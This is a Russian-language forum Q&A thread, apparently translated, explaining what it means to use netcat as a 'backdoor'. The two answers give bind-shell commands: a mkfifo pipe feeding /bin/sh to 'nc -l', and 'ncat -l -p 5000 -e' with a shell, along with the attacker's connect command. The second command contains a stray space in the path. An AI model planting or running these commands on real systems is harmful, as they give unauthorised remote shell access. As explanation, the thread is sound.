Я недавно читал о netcat, и часто упоминается, что его можно использовать как "черный ход". Что именно подразумевается под бэкдором? Может кто-нибудь привести пример такого использования netcat.
2 ответа
1
Все, что может прослушивать входящие сетевые соединения (например, Perl, python, zsh, socat, inetd), можно считать бэкдором.
Основная причина, по которой я думаю, что nc в частности, может рассматриваться скорее как бэкдор, чем другие (даже при том, что у него гораздо меньше возможностей в этом отношении), заключается в том, что на его man-странице показан пример такого бэкдора:
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f
1
С помощью netcat простой пользователь может создать удаленную оболочку. Например, следующая команда позволит удаленному пользователю получить доступ к оболочке bash через порт 5000
ncat -l -p 5000 -e /bin /bash
Все, что атакующий должен сделать после запуска:
IP-адрес ncat 5000
Вы даже можете попробовать этот пример на своем компьютере.
Однако это будет работать только через Интернет, если нет брандмауэра, блокирующего доступ к порту 5000.